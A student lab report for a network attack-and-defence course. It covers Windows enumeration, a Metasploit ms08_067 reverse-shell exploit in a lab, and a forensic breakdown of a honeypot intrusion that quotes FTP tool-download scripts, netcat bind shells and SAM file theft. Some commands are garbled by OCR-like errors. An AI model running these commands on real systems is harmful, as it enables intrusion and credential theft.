20221915 2022-2023-2 《网络攻防实践》实践六报告

20221915 2022-2023-2 《网络攻防实践》实践六报告

1.实践内容

DNS服务

• DNS区域传送

nslookup:default server
ls -d Domain_DNS_NAME

• 阻断DNS区域传送

MMC控制台配置DNS服务去掉Allow Zone Transfers，禁止区域传送

• 主机查点-NetBIOS网络查点

使用net view查点域 列出网络上的工作组和域： net view / domain；
列出指定组／域中的所有计算机：net view/domain:DOMAIN_NAME；

• 识别域控制器

nltest /dclist:DOMAIN_NAME
查看NetBIOS名字表
列举： 自带工具nbtstat -A TARGET_IP；
扫描： 免费工具nbtscan

• Windows系统远程攻击

Windows独有组网协议和服务
SMB（远程口令猜测）MSRPC,LSASS；
各种网络服务在Windows平台的具体实现
IIS, MSSQL Server,远程桌面
社会工程学、攻击客户端软件等

• 远程口令字猜测
  Windows文件与打印共享服务-SMB

TCP 139: NetBIOS Session Service
TCP 445: SMB over HTTP直连主机服务

攻击点：默认开放的隐藏共享卷

IPC$：进程间通信

目标系统用户名单

通过查点方法收集用户帐户信息：dumpsec
内建用户：Guest, Administrator

• 远程口令字防御策略

网络防火墙：限制TCP139/445端口访问 主机级安防机制限制对SMB的访问 IPSec过滤器 Windows防火墙
禁用SMB服务放弃Windows文件和打印共享 制定和实施强口令字策略 设置帐户锁定阙值
激活帐户登录失败事件审计功能，定期查看EventLog 用入侵检测／防御系统进行实时报警和防御

取证分析实践
首先根据这个题目很难看出来这个分析需要做什么，那么我们就需要从文件分析本身和教材出手，这章的教材主要是讲解的是Windows操作系统中存在的漏洞并且进行攻击获取靶机权限之后植入后门；结合取证分析文件本身和教材的知识，我们基本按照教材讲解的顺序进行分析。
对shell代码进行分析：

• 从这些shell语句中可以看到攻击者使用IIS Unicode漏洞进入靶机之后，利用其msadcs.dl中的RDS漏洞允许任意代码执行的缺陷进行下面的操作；
• 其中第一，二段的ftpcom可知攻击机打开1P213.116.251.162h主机后，使用FTP的方式下载文件，其中pdump.exe和‘amdump.dM是配合使用破解口令的，使用samdump.dM拿到口令后再用pdump.exe进行破解，其中SAM(Security
  Account Management)文件是通过安全标识进行安全账号管理文件：
• 说明：本地特权提升一般采用DLL注入或者破解本地程序安全漏
  洞得到，因此这里也可以理解用到的是msadcs.d和pdump.eXe和samdump.dl进行口令破解和提权。
  第二段和第三段中sasfile为高效读入数据的方式，因此为1P分别为212.139.12.26和213.116.251.162写入了文件，值得注意的是nc.exe文件是一个远程入侵的后门程序，便于下次攻击；
  再继续分析msadcs…dl的shell命令，整理如下：
  从左边的shell命令可以看到攻击机进入靶机之后查看了一些系统文件，注意关键字ProgramFiles;然后创建会话写入文件yay.txt,注意到前面有odump…exe,这是上一步中提到的口令破解文件，因此猜测创建的会话将破解的口令写入文件vay.txt；
• 接下来是要创建了用户组等提升攻击机的访问权限：
• 然后利用磁盘修复工具包中的rdisk工具创建SAM文件副本(SAM文件中可是安全账号管理哦！)可以发现创建的口令来来回回执行了好几次，猜测这个攻击者这步操作不是很顺利？！毕竟是SAM文件！
• 然后是尝试删除和拷贝SAM文件中的数据即删除和拷贝har.txt文件；
  以上的NT分析给了我们提醒如果我们的主机被攻击了怎么办，所以我们需要防范措施如下：
• 首先肯定是自身的口令要是强口令，这样可以增大破解口令难度；
• 然后是定期的打补丁，修复漏洞：
• 最后是要定期的扫描自身的主机，查看是否存在漏洞等危险。

2.实践过程

（1）动手实践Metasploit windows attacker

1. 选择主机IP表示如下：
   |虚拟机| IP |
   |–|–|
   | 攻击机kali | 192.168.200.3 |
   | 靶机Win2kServer | 192.168.200.124 |
2. 通过命令 msfconsole 启动kali中的msfconsole
   
3. 通过命令 search ms08_067 查看漏洞ms08_067的相关信息:
   
   4.输入 exploit/windows/smb/ms08_067_netapi，然后输入show payloads显示可攻击载荷：
   
4. 通过命令set payload generic/shell_reverse_tcp设置攻击载荷为tcp的反向连接，通过命令set LHOST 192.168.200.3设置kali为渗透攻击的主机，设置渗透攻击的靶机IP的命令为set RHOST 192.168.200.124：
   
5. 再通过命令 exploit 开始渗透攻击：
   
6. 输入指令ipconfig，得出靶机IP地址，攻击成功：
   

（2）取证分析实践：解码一次成功的NT系统破解攻击。

来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net)，要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么？

1. 攻击者使用了什么破解工具进行攻击？

• 从攻击主机X首先访问了蜜罐T上的http://lab.wiretrip.net/Default.htm页面

其User-Agent域设置为Mozilla/4.0
Accept字段中显示访问主机安装了MS word等软件；
推测主机应为NT5.0系统，安装了MSIE5.01和Hotbar2.0插件。

• 攻击者利用了Unicode攻击（针对MSOO-078/MSOl-026) 和针对msadcs.dll中RDS漏洞 (MS02-065)的msadc.pl/msadc2.pl渗透攻击工具进行了攻击。如下图：
  
  

2. 攻击者如何使用这个破解工具进入并控制了系统 ？
   （1）：通过FTP脚本尝试在目标主机下载工具(pdump/samdump/netcat)由于记错口令失败，如下图：
   多次尝试编写FTP脚本出错， 失败；

SESSION: 1874-SO"copy C:\winnt\syste m32\cmd.exe cmdl.exe"
SESSION:1875-SO"cmdl.exe /c open 213.116 .251.162 >ftpcom"
SESSION:1876-SO"cmdl.exe /c echo johna2k >>ftpcom"
SESSION:1877-SO"cmdl.exe /cecho haxedjOO >>ftpcom"
SESSION:1879-SO"cmdl.exe /cecho get nc.exe >>ftpcom"
SESSION:1880-SO"cmdl.exe /cecho get pdum p.exe >>ftpcom"
SESSION:1881-SO"cmdl.exe /cecho get samdum p.dll >>ft pcom"
SESSION:1882-SO"cmdl.exe /cecho quit >>ftpcom"
SESSION:1885-SO"cmdl.exe /cftp -s:ftpcom"

（2）：通过Netcat获得远程访问shell, 正式获得远程访问权

SESSION:1887-SO"cmdl.exe /c nc -I -p 6969 -e cmdl.exe"
20:42:47 X:1888 -> T:6969 incomin g NC cmd.exe sessi on: see./log/ 172.16.1.106/SESSION :6969-1888

3. 攻击者获得系统访问权限后做了什么 ？

• 本地权限提升

攻击者目前获取的远程访问权限
IIS启动帐户： IUSR_machimachinename；
能够通过MDACRDS以SYSTEM账号权限运行任意指令；
攻击者目标： 获取本地Administrator权限

• 本次权限提升-刺探用户组信息
  
• 本地权限提升

再次尝试pdump 20:58:08 X:1888 -> T:6969 interactive (netcat): ‘pdump’，仍然失败 放弃pdump 21:05:27 X:1888 -> T:6969 interactive
(netcat):‘delpdump.exe’ and ‘del samdump.dll’

• 本地权限提升-获取SAM备份

rdisk/s-备份关键信息，在\repair目录中就会创建一个名为sam._的SAM压缩拷贝，备份的san.文件在使用之前需要通过expand进行扩展。
开启另外一个Netcat远程shell
21:10:42X:1987-> T:80 exec (unicode)‘nc -I -p 6969-e cmdl.exe’
21:10:46X:1988-> T:6969failed (RST) incoming netcat session
21:10:54X:1989-> T:6969 failed again
21:11:19X:1992-> T:80exec (unicode) nc -1 -p 6968-e cmdl.exe
21:11:24X:1993-> T:6968incoming NC cmd.exe session: see./log/ 17 2.16.1.106/SESSION:6969-1888
将SAM备份文件拷贝至IIS的根目录inetpub, 并通过Web方式下载了该文件
21:12:22X:1993->T:6968 interactive (netcat): copies；c:\har.txt to inetpub
21:12:32X:1995-> T:80 get /har.txt (sam.)
21:15:23X:1998-> T:80 exec(msadc):‘del c: \i net pub\ wwwroot\har.txt’；c:\inetpub\wwwroot\har.txt’
21:16:32T:6968-> X:1993 second nc session ends

攻击机上使用 LOphtcrack进行口令字破解： ｀SOuthP’，完成权限提升

4. 我们如何防止这样的攻击?

• 直接防御措施：打补丁

Unicode - http://www.microsoft.com/technet/securitv
/bulletin/ms00-057.asp RDS - htto://www.microsoft.com/technet/securitv /Bulletin/ MS02-065.msox

• 进一步防御措施：IIS安全防范措施

禁用用不着的RDS等服务
为webserver在单独的文件卷上设置虚拟根目录
使用IIS Lockdown 和 URLScan 等工具加强web server

5. 你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么？

• 攻击者意识到了他的目标是作为蜜罐主机的；

攻击者建立文件并输入如下内容，由于目标主机作为rfp个人网站，Web服务所使用的IIS甚至没有更新rfp自己所发现的MDAC
RDS安全漏洞，很容易让攻击者意识到这是个诱饵。

（3）团队对抗实践：windows系统远程渗透攻击和分析。

攻方使用metasploit选择漏洞进行攻击，获得控制权。（要求写出攻击方的同学信息、使用漏洞、相关IP地址等）
防守方使用wireshark监听获得的网络数据包，分析攻击过程，获取相关信息。
本方攻击机及IP：Kali Linux 192.168.116.127
本方靶机及IP：Windows2k 192.168.116.66
对方攻击机及IP：Kali Linux 192.168.116.127
对方靶机及IP：Windows2k 192.168.116.71
攻击方

• 打开msfconsole，选择相应攻击脚本、负载，设置脚本所需要的参数；
  
• 输入exploit进行攻击后，我们在靶机方创建了一个名叫wjswez的文件夹
  
  靶机方
• 作为靶机，我们可以打开wireshark进行等待抓包
• 我们可以看到攻击机在靶机的445端口建立连接；
• 一些SMB协议数据包；
• 可以看到攻击机在我方靶机上创建了一个文件夹，然后结束本次攻击
  
  
  

3.学习中遇到的问题及解决

问题1：配置windoes桥接时，找不到vmnet0网卡

问题1解决方案：关闭所有虚拟机的前提下初始化网卡，对vmware网卡重新进行安装。

4.实践总结

在此次实践中，能够充分理解攻击靶机漏洞的机理，同时也在分析攻击过程中，学习到了不同角色间，需要做的相关工作。

参考资料

《网络攻防实践》